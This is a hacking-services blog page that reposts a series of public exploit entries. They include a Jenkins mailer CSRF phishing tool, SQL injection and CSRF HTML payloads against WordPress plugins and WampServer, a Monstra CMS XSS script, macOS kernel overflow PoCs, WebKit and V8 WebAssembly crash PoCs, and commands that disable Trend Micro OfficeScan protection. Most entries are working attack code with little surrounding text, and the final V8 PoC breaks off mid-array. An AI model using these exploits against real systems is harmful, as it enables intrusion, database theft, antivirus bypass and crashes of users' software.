Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863571747

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery
# Date : 2018-06-05
# Exploit Author : Kl3_GMjq6
# Vendor Homepage : https://jenkins.io/
# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774
# Tested on : Linux , Windows
# CVE : CVE-2018-8718

import email.message
import smtplib
import getpass

payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw']
table = {}
for i in payload_list :
    table.update({i:''})
    
def send_mail() :
    msg = email.message.Message()
    msg['Subject'] = table['subject']
    msg['From'] = table['sender']
    msg['To'] = table['reciver']
    msg.add_header('Content-Type','text/html')
    msg.set_payload('<a href="'+table['url']+'\
/descriptorByName/hudson.tasks.Mailer/sendTestMail?\
charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+'\
&smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+'\
&useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'">\
'+table['cover_message']+'</a>')
    s = smtplib.SMTP(table['smtp_server'])
    s.starttls()
    s.login(table['l_id'],
            table['l_pw'])
    s.sendmail(msg['From'], [msg['To']], msg.as_string())

def url_set() :
    url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
    if len(url) <= 0 :
        print ("    Can't Be Null!")
        url_set()
    elif url[0:4] != "http" :
        print ("    URL must start with 'http://' ")
        url_set()
    else : table['url'] = url

def subject_set() :
    subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : "))
    if len(subject) <= 0 :
        subject = "Look! Waning with your Jenkins"
    table['subject'] = subject

def cover_message() :
    cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : "))
    if len(cover_message) <= 0 :
        cover_message = "Here is your Vulnable!"
    table['cover_message'] = cover_message
    
def sender() :
    sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : "))
    if len(sender) <= 0 :
        print ("    Can't Be Null!")
        sender()
    else : table['sender'] = sender

def reciver() :
    reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : "))
    if len(reciver) <= 0 :
        print ("    Can't Be Null!")
        reciver()
    else : table['reciver'] = reciver

def test_email() :
    test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : "))
    if len(test_email) <= 0 :
        print ("    Can't Be Null!")
        test_email()
    table['test_email']  = test_email

def smtp_server() :
    smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : "))
    if len(smtp_server) <= 0 :
        smtp_server = "smtp.gmail.com"
    table['smtp_server'] = smtp_server

def l_id() :
    l_id = str(input ("Your SMTP_Server ID  : "))
    if len(l_id) <= 0 :
        print ("    Can't Be Null!")
        l_id()
    table['l_id'] = l_id

def l_pw() :
    l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
    if len(l_pw) <= 0 :
        print ("    Can't Be Null!")
        l_pw()
    table['l_pw'] = l_pw

def set_all () :
    url_set()
    subject_set()
    cover_message()
    sender()
    reciver()
    test_email()
    smtp_server()
    l_id()
    l_pw()
    print ("Setting Complit! Use 'show' to check options")

set_help = {
    'all':"Set all payload",
    'help':"Show set commend's help",
    'url_set':"Set only 'url_set' payload",
    'subject_set':"Set only 'url_set' payload",
    'cover_message':"Set only 'cover_message' payload",
    'sender':"Set only 'sender' payload",
    'reciver':"Set only 'reciver' payload",
    'test_email':"Set only 'test_email' payload",
    'smtp_server':"Set only 'smtp_server' payload",
    'l_id':"Set only 'l_id' payload",
    'l_pw':"Set only 'l_pw' payload",
    }

def set_select (a) :
    if a=="all" : set_all() 
    elif a=="url_set" : url_set()
    elif a=="subject_set" : subject_set()
    elif a=="cover_message" : cover_message()
    elif a=="sender" : sender()
    elif a=="reciver" : reciver()
    elif a=="test_email" : test_email()
    elif a=="smtp_server" : smtp_server()
    elif a=="l_id" : l_id()
    elif a=="l_pw" : l_pw()
    elif a=="help" :
        for i in set_help :
            print ("    -%-20s %-s" %(i,set_help[i]))
    print ('')



while True :
    direct = str(input ("CVE-2018-8718 >> ")).lower()
    
    if direct == "help" :
        print ("""\
    %-10s Show this help menu.          
    %-10s [-all / -help / -url_set / -subject_set / .... ]
    %-10s Set the Payload
    %-10s [-all] Show Current Setting.
    %-10s Send CSRF use current setting.
    """ %("help","set","","show","send"))
        
    elif direct[0:3] == "set" :
        if ' -' not in direct :
            if direct == "set" :
                set_option = ["help"]
            else :
                print ("    Option error \n")
        else :
            set_option = direct.split(' -')[1:]
        okay = 1

        if len(set_option) == 1 :
            if set_option[0] not in set_help :
                print ("    Option error \n")
            else :
                set_select(set_option[0])
        elif len(set_option) >= 2 :
            for i in set_option :
                if i in ['help', 'all'] :
                    print ("     *Option [-help / -all] cannot be use with another options \n")
                    okay = 0
                    break
            for i in set_option :
                if i not in set_help :
                    print ("    Option error \n")
                    okay = 0
                    break
            if okay == 1 :
                for i in set_option :
                    set_select(i)
                    
    elif direct[:4] == "show" :
        if " -" not in direct :

            if direct == "show" :
                for i in table :
                    if i != "l_pw" :
                        print ("    %-20s %s" %(i,table[i]))
                print ("    If you want to see l_pw... add [-all] option")
                print ("")
            else :
                print ("    Option error \n")
        else :
            show_option = direct.split(" -")[1:]
            if (len(show_option) == 1 and show_option[0] == 'all') :
                for i in table :
                    print ("      %-20s %s" %(i,table[i]))
                print ()
            else :
                print ("    Option error \n")
        
    elif direct == "send" :
        print ("    Sending CSRF Mail.....")
        try :
            send_mail()
            print ("    Succed!!\n")
        except :
            print ("    Fail....")
            
    elif direct == "exit" :
        break
    
    else :
        print ("    Usage : help\n")
HireHackking 
mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.

The logic of this function fails to correctly handle source and destination sockaddrs which aren't
AF_INET or AF_INET6:

// verify sa_len for AF_INET:

  if (dst->sa_family == AF_INET &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
    mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// verify sa_len for AF_INET6:

  if (dst->sa_family == AF_INET6 &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
    mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// code doesn't bail if sa_family was neither AF_INET nor AF_INET6

  if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
    if (mptcp_entitlement_check(mp_so) < 0) {
      error = EPERM;
      goto out;
    }

    mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
  }

// memcpy with sa_len up to 255:

  if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
    memcpy(&mpte->mpte_dst, dst, dst->sa_len);
  }

This PoC triggers the issue to overwrite the mpte_itfinfo field leading to a controlled pointer
being passed to kfree when the socket is closed.

Please note that these lengths seem to be trusted in multiple places - I would strongly suggest auditing
this code quite thoroughly, especially as mptcp can be reached from more places as of iOS 11.

Note that the MPTCP code does seem to be quite buggy; trying to get a nice PoC working for this buffer overflow
bug I accidentally triggered the following error path:

  error = socreate_internal(dom, so, SOCK_STREAM, IPPROTO_TCP, p,
          SOCF_ASYNC, PROC_NULL);
  mpte_lock(mpte);
  if (error) {
    mptcplog((LOG_ERR, "%s: subflow socreate mp_so 0x%llx unable to create subflow socket error %d\n",
        (u_int64_t)VM_KERNEL_ADDRPERM(mp_so), error),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);

    proc_rele(p);

    mptcp_subflow_free(mpts);
    return (error);
  }

note that first argument to mptcplog has one too few arguments. It's probably not so interesting from a security
POV but is indicative of untested code (this error path has clearly never run as it will always kernel panic.) 

This PoC is for MacOS but note that this code is reachable on iOS 11 from inside the app sandbox if you give yourself
the multipath entitlement (which app store apps can now use.)

Just run this PoC as root on MacOS for easy repro.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44849.zip
HireHackking 
/*
getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.

When allocating a kernel buffer to serialize the attr list to there's the following comment:

  /*
   * Allocate a target buffer for attribute results.
   * Note that since we won't ever copy out more than the caller requested,
   * we never need to allocate more than they offer.
   */
  ab.allocated = ulmin(bufferSize, fixedsize + varsize);
  if (ab.allocated > ATTR_MAX_BUFFER) {
    error = ENOMEM;
    VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
    goto out;
  }
  MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);

The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:

  /* Return attribute set output if requested. */
  if (return_valid) {
    ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
    if (pack_invalid) {
      /* Only report the attributes that are valid */
      ab.actual.commonattr &= ab.valid.commonattr;
      ab.actual.volattr &= ab.valid.volattr;
    }
    bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
  }

There's no check that the allocated buffer is big enough to hold at least that.

Tested on MacOS 10.13.4 (17E199)
*/

// ianbeer
#if 0
MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist

getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.

When allocating a kernel buffer to serialize the attr list to there's the following comment:

	/*
	 * Allocate a target buffer for attribute results.
	 * Note that since we won't ever copy out more than the caller requested,
	 * we never need to allocate more than they offer.
	 */
	ab.allocated = ulmin(bufferSize, fixedsize + varsize);
	if (ab.allocated > ATTR_MAX_BUFFER) {
		error = ENOMEM;
		VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
		goto out;
	}
	MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);

The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:

	/* Return attribute set output if requested. */
	if (return_valid) {
		ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
		if (pack_invalid) {
			/* Only report the attributes that are valid */
			ab.actual.commonattr &= ab.valid.commonattr;
			ab.actual.volattr &= ab.valid.volattr;
		}
		bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
	}

There's no check that the allocated buffer is big enough to hold at least that.

Tested on MacOS 10.13.4 (17E199)

#endif

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/attr.h>

int main() {
  int fd = open("/", O_RDONLY);
  if (fd == -1) {
    perror("unable to open fs root\n");
    return 0;
  }

  struct attrlist al = {0};

  al.bitmapcount = ATTR_BIT_MAP_COUNT;
  al.volattr = 0xfff;
  al.commonattr = ATTR_CMN_RETURNED_ATTRS;

  size_t attrBufSize = 16;
  void* attrBuf = malloc(attrBufSize);
  int options = 0;

  int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options);
  printf("err: %d\n", err);
  return 0;
}
HireHackking 
# Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Form Maker plugin
# https://wordpress.org/plugins/form-maker/
# Version: 1.12.24 and below
# Vendor Status: Vendor contacted, update released

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.

# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="2) AND (SELECT * FROM (SELECT(SLEEP(42)))XXX)-- XXX"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>
HireHackking 
# Exploit Title: Ftp Server 1.32 - Credential Disclosure
# Date: 2018-05-29
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Version: 1.32 Android App
# Vendor: The Olive Tree
# Exploit Author: ManhNho
# CVE: N/A
# Category: Mobile Apps
# Tested on: Android 4.4

# Description
# Ftp Server 1.32 Insecure Data Storage, the result of storing confidential
# information insecurely on the system i.e. poor encryption, plain text, 
# access control issues etc. Attacker can find out username/password of valid user via
# /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml

# PoC

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="prefPort">2221</string>
    <string name="prefPasivePort">2300-2399</string>
    <string name="prefUserpass">ManhNho</string>
    <boolean name="prefEnergySave" value="false" />
    <boolean name="prefShowHidden" value="false" />
    <boolean name="prefShowCredentials" value="true" />
    <string name="prefInterfaces">0</string>
    <string name="prefHomeDir">1</string>
    <string name="prefUsername">ManhNho</string>
    <boolean name="prefReadonly" value="false" />
    <boolean name="prefAnonymous" value="true" />
    <boolean name="prefForeground" value="true" />
</map>
HireHackking 
# Exploit Title: WampServer 3.0.6 - Cross-Site Request Forgery
# Date: 2018-06-11
# Exploit Author: L0RD
# Software Link: https://ufile.io/gpqh9
# Vendor Homepage: http://www.wampserver.com/en/
# Version: 3.0.6 - 64bit
# Tested on: Win 10

# Description :
# An issue was discovered in WampServer 3.0.6 which allows a remote
# attacker to force any victim to add or delete virtual hosts.

# POC 1 :
# Add virtual hosts exploit :

<html>
 <head>
   <title>Exploit</title>
 </head>
<body>
  <form action="http://localhost/add_vhost.php?lang=english" method="post">
    <input type="hidden" name="vh_name" value="lord" />
    <input type="hidden" name="vh_ip" value="" />
    <input type="hidden" name="vh_folder" value="C:\wamp64\www"/>
    <input type="submit" name="submit" value="test">
  </form>
 </body>
</html>

# POC 2 :
# Delete virtual hosts exploit :
# Use this exploit to delete specific vhost :
# Exploit :

<form method='post' action="http://localhost/add_vhost.php?lang=english">
    <input type='hidden' name='virtual_del[]' value='Set your vhost name here' checked="true" />
    <input type="submit" name="vhostdelete" value="test">
</form>
HireHackking 
# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
# Date: 2018-06-07
# Author: DEEPIN2
# Software: Monstra CMS
# Version: 3.0.4 and earlier
# This automation code requires Python3
# You must intercept the first request through the proxy tool to verify the CSRF token.

import requests
import re

def runXSS(target, cookie, data):
	exploit = requests.post(target, cookies=cookie, data=data).text
	if re.search('exploit', exploit):
		return 'OK'
	else:
		return 'ERROR'
	
if __name__ == '__main__':
	print('''  ______     _______     ____   ___  _  ___        _  ___  _ _  ___
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / |/ _ \/ / |( _ )
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|\___/|_|_|\___/
 	[*] Author : DEEPIN2(Junseo Lee)
---------------------------------------------------------------------''')
	print('[*] Ex) http://www.target.com -> www.target.com')
	url = input('Target : ')
	print('[*] Required admin\'s PHPSESSID.')
	PHPSESSID = input('PHPSESSID : ')
	pagename = input('Pagename : ')
	script = input('Script : ')
	target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
	cookie = {'PHPSESSID':PHPSESSID}
	data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
			'page_title':script,\
			'page_name':pagename,\
			'page_meta_title':'',\
			'page_keywords':'',\
			'page_description':'',\
			'pages':0,\
			'templates':'index',\
			'status':'published',\
			'access':'public',\
			'editor':'',\
			'page_tags':'',\
			'add_page_and_exit':'Save+and+Exit',\
			'page_date':'9999-99-99'}

	result = runXSS(target, cookie, data)
	print('-' * 69)
	if result == 'OK':
		print('[+] LINK : http://' + url + '/' + pagename)
	else:
		print('[-] Error')
HireHackking 
# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Contact Form Maker plugin
# Software link: https://wordpress.org/plugins/contact-form-maker/
# Version: 1.12.20 and below

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.


# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>
HireHackking 
<!--
There is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the functuion getWasmBufferFromValue. This function returns the code buffer as follows:

return arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());

If the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:

memcpy(result.data(), data + byteOffset, byteSize);

This means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either though parsing exceptions or data sections when they are copied. A minimal PoC for the issue is:

var b2 = new ArrayBuffer(1000);
var view = new Int8Array(b2, 700);
var mod = new WebAssembly.Module(a);

An HTML file the consistently crashes Safari is attached.
-->

<html><body><script>
for(var q = 0; q < 100; q++){
var i = Math.random();
i = Math.round(i*0x20000000);
i = Math.abs(i);
var b2 = new Uint8Array( i);
console.log("i" + i);
var j = Math.random();
j = j*i;
j = Math.round(j);
j = Math.abs(j);
console.log("j"+j)
var view2 = new DataView(b2.buffer,j);
try{
var mod = new WebAssembly.Module(view2);
}catch(e){
console.log(e);
}
}
</script></body></html>
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-v11.0-UNAUTHORIZED-CHANGE-PREVENTION-SERVICE-BYPASS.txt
[+] ISR: Apparition Security          
 


***Greetz: indoushka|Eduardo|Dirty0tis***



Vendor:
=============
www.trendmicro.com



Product:
===========
OfficeScan XG v11.0 


OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.




Vulnerability Type:
===================
Unauthorized Change Prevention Bypass



CVE Reference:
==============
CVE-2018-10507



Security Issue:
================
Attackers or malwarez that can access the system hosting the OfficeScan XG AV, can bypass the antivirus protection feature that prevents unauthorized changes
from being made like killing protected OfficeScan XG processes such as "PccNTMon.exe".


References:
============
https://success.trendmicro.com/solution/1119961



Exploit/POC:
=============

1) net user hacker abc123 /add

2) sc.exe config "TMBMServer" obj= ".\hacker" password= "pwnage"

3) net user hacker /delete

4) shutdown /r

Done!, now kill "PccNTMon.exe" or whatever...

requires Admin permissions to exploit


Network Access:
===============
Local



Severity:
=========
Medium



Disclosure Timeline:
=============================
Vendor Notification:  June 29, 2017
Vendor releases critical patch and advisory : June 5, 2018
June 7, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Title: Gnome Web/Epiphany Browser < 3.28.2.1 - DoS App Crash (PoC)
# Exploit Author: https://github.com/ldpreload
# Date: 2018-06-06
# Link: https://wiki.gnome.org/Apps/Web
# Version: 3.28.2.1

<!>

libephymain.so in GNOME WEB/Epiphany < 3.28.2.1 allows a remote attacker to cause a Denial Of Service and crash the users browser. The cause of this is the "document.write"

<!>

PoC:

<script>
b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250");
b1tch3z.document.write("<p>~ua b1tch3z</p>");

// https://github.com/undergroundagency
// https://github.com/ldpreload
</script>

Video PoC:
https://vimeo.com/273769801

<!>

ld@b1tch3z:~$ gdb epiphany
(gdb) run
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

[New Thread 0x7fffdf7ab700 (LWP 23486)]
[New Thread 0x7fffdd929700 (LWP 23487)]
[New Thread 0x7fffdd128700 (LWP 23488)]
[New Thread 0x7fffd7fff700 (LWP 23489)]
[New Thread 0x7fffd77fe700 (LWP 23490)]
[New Thread 0x7fffd6ffd700 (LWP 23491)]
[New Thread 0x7fffd67fc700 (LWP 23492)]
[New Thread 0x7fffd5ffb700 (LWP 23493)]
[New Thread 0x7fffd57fa700 (LWP 23494)]
[New Thread 0x7fff8b4c4700 (LWP 23499)]
[New Thread 0x7fff899bc700 (LWP 23503)]
[New Thread 0x7fff88fff700 (LWP 23506)]
[New Thread 0x7fff6bfff700 (LWP 23507)]
[New Thread 0x7fff6ae5f700 (LWP 23514)]
[New Thread 0x7fff6a65e700 (LWP 23521)]

[Thread 0x7fff6a65e700 (LWP 23521) exited]
[Thread 0x7fffd5ffb700 (LWP 23493) exited]
[New Thread 0x7fffd5ffb700 (LWP 23527)]
[New Thread 0x7fff6a65e700 (LWP 23528)]
[New Thread 0x7fff691f6700 (LWP 23529)]
[New Thread 0x7fff689f5700 (LWP 23530)]
[New Thread 0x7fff43fff700 (LWP 23531)]
[New Thread 0x7fff3b7fe700 (LWP 23532)]
[New Thread 0x7fff437fe700 (LWP 23533)]
[Thread 0x7fff3b7fe700 (LWP 23532) exited]
[Thread 0x7fff899bc700 (LWP 23503) exited]
[Thread 0x7fff691f6700 (LWP 23529) exited]
[Thread 0x7fff689f5700 (LWP 23530) exited]
[Thread 0x7fff437fe700 (LWP 23533) exited]
[Thread 0x7fff43fff700 (LWP 23531) exited]
[Thread 0x7fff6a65e700 (LWP 23528) exited]
[New Thread 0x7fff6a65e700 (LWP 23557)]
[Thread 0x7fffd5ffb700 (LWP 23527) exited]
[New Thread 0x7fffd5ffb700 (LWP 23566)]
[Thread 0x7fff6a65e700 (LWP 23557) exited]
[Thread 0x7fffd5ffb700 (LWP 23566) exited]
[New Thread 0x7fffd5ffb700 (LWP 23591)]
[New Thread 0x7fff6a65e700 (LWP 23592)]
[Thread 0x7fffd5ffb700 (LWP 23591) exited]
[New Thread 0x7fffd5ffb700 (LWP 23597)]
[Thread 0x7fffd5ffb700 (LWP 23597) exited]
[New Thread 0x7fffd5ffb700 (LWP 23612)]
[Thread 0x7fff6a65e700 (LWP 23592) exited]
[Thread 0x7fffd5ffb700 (LWP 23612) exited]
[New Thread 0x7fffd5ffb700 (LWP 23625)]
[New Thread 0x7fff6a65e700 (LWP 23633)]
[Thread 0x7fff6a65e700 (LWP 23633) exited]
[New Thread 0x7fff6a65e700 (LWP 23644)]
[Thread 0x7fff6a65e700 (LWP 23644) exited]
[New Thread 0x7fff6a65e700 (LWP 23648)]
[Thread 0x7fffd5ffb700 (LWP 23625) exited]
[New Thread 0x7fffd5ffb700 (LWP 23652)]
[Thread 0x7fff6a65e700 (LWP 23648) exited]
[New Thread 0x7fff6a65e700 (LWP 23656)]
[Thread 0x7fff6a65e700 (LWP 23656) exited]
[Thread 0x7fffd5ffb700 (LWP 23652) exited]
[New Thread 0x7fffd5ffb700 (LWP 23684)]
[New Thread 0x7fff6a65e700 (LWP 23685)]
[Thread 0x7fffd5ffb700 (LWP 23684) exited]
[New Thread 0x7fffd5ffb700 (LWP 23715)]
[Thread 0x7fff6a65e700 (LWP 23685) exited]
[New Thread 0x7fff6a65e700 (LWP 23741)]
[Thread 0x7fffd5ffb700 (LWP 23715) exited]
[New Thread 0x7fffd5ffb700 (LWP 23773)]
[Thread 0x7fffd5ffb700 (LWP 23773) exited]
[New Thread 0x7fffd5ffb700 (LWP 23811)]
[Thread 0x7fff6a65e700 (LWP 23741) exited]
[New Thread 0x7fff6a65e700 (LWP 23815)]
[Thread 0x7fffd5ffb700 (LWP 23811) exited]
[New Thread 0x7fffd5ffb700 (LWP 23823)]
[Thread 0x7fff6a65e700 (LWP 23815) exited]

Thread 43 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd5ffb700 (LWP 23823)]
0x00007ffff77bcb2d in ?? () from /usr/lib/epiphany/libephymain.so

(gdb) bt
#0  0x00007ffff77bcb2d in  () at /usr/lib/epiphany/libephymain.so
#1  0x00007ffff6cb7e39 in  () at /usr/lib/libgio-2.0.so.0
#2  0x00007ffff7040463 in  () at /usr/lib/libglib-2.0.so.0
#3  0x00007ffff703fa2a in  () at /usr/lib/libglib-2.0.so.0
#4  0x00007fffefa70075 in start_thread () at /usr/lib/libpthread.so.0
#5  0x00007ffff7b1453f in clone () at /usr/lib/libc.so.6
HireHackking 
/*
When v8 decodes the locals of a function, it performs a check:

if ((count + type_list->size()) > kV8MaxWasmFunctionLocals) {
        decoder->error(decoder->pc() - 1, "local count too large");
        return false;
      }

On a 32-bit platform, this check can be bypassed due to an integer overflow. This allows the number of function locals to be large, and can lead to memory corruption when the locals are allocated.

A PoC is attached. 
*/

var b2 = new Uint8Array( 171);
b2[0] = 0x0;
b2[1] = 0x61;
b2[2] = 0x73;
b2[3] = 0x6d;
b2[4] = 0x1;
b2[5] = 0x0;
b2[6] = 0x0;
b2[7] = 0x0;
b2[8] = 0x1;
b2[9] = 0xe;
b2[10] = 0x3;
b2[11] = 0x60;
b2[12] = 0x1;
b2[13] = 0x7f;
b2[14] = 0x0;
b2[15] = 0x60;
b2[16] = 0x0;
b2[17] = 0x0;
b2[18] = 0x60;
b2[19] = 0x2;
b2[20] = 0x7f;
b2[21] = 0x7f;
b2[22] = 0x1;
b2[23] = 0x7f;
b2[24] = 0x2;
b2[25] = 0x23;
b2[26] = 0x2;
b2[27] = 0x2;
b2[28] = 0x6a;
b2[29] = 0x73;
b2[30] = 0x3;
b2[31] = 0x6d;
b2[32] = 0x65;
b2[33] = 0x6d;
b2[34] = 0x2;
b2[35] = 0x0;
b2[36] = 0x1;
b2[37] = 0x7;
b2[38] = 0x69;
b2[39] = 0x6d;
b2[40] = 0x70;
b2[41] = 0x6f;
b2[42] = 0x72;
b2[43] = 0x74;
b2[44] = 0x73;
b2[45] = 0xd;
b2[46] = 0x69;
b2[47] = 0x6d;
b2[48] = 0x70;
b2[49] = 0x6f;
b2[50] = 0x72;
b2[51] = 0x74;
b2[52] = 0x65;
b2[53] = 0x64;
b2[54] = 0x5f;
b2[55] = 0x66;
b2[56] = 0x75;
b2[57] = 0x6e;
b2[58] = 0x63;
b2[59] = 0x0;
b2[60] = 0x0;
b2[61] = 0x3;
b2[62] = 0x3;
b2[63] = 0x2;
b2[64] = 0x1;
b2[65] = 0x2;
b2[66] = 0x7;
b2[67] = 0x1e;
b2[68] = 0x2;
b2[69] = 0xd;
b2[70] = 0x65;
b2[71] = 0x78;
b2[72] = 0x70;
b2[73] = 0x6f;
b2[74] = 0x72;
b2[75] = 0x74;
b2[76] = 0x65;
b2[77] = 0x64;
b2[78] = 0x5f;
b2[79] = 0x66;
b2[80] = 0x75;
b2[81] = 0x6e;
b2[82] = 0x63;
b2[83] = 0x0;
b2[84] = 0x1;
b2[85] = 0xa;
b2[86] = 0x61;
b2[87] = 0x63;
b2[88] = 0x63;
b2[89] = 0x75;
b2[90] = 0x6d;
b2[91] = 0x75;
b2[92] = 0x6c;
b2[93] = 0x61;
b2[94] = 0x74;
b2[95] = 0x65;
b2[96] = 0x0;
b2[97] = 0x2;
b2[98] = 0xa;
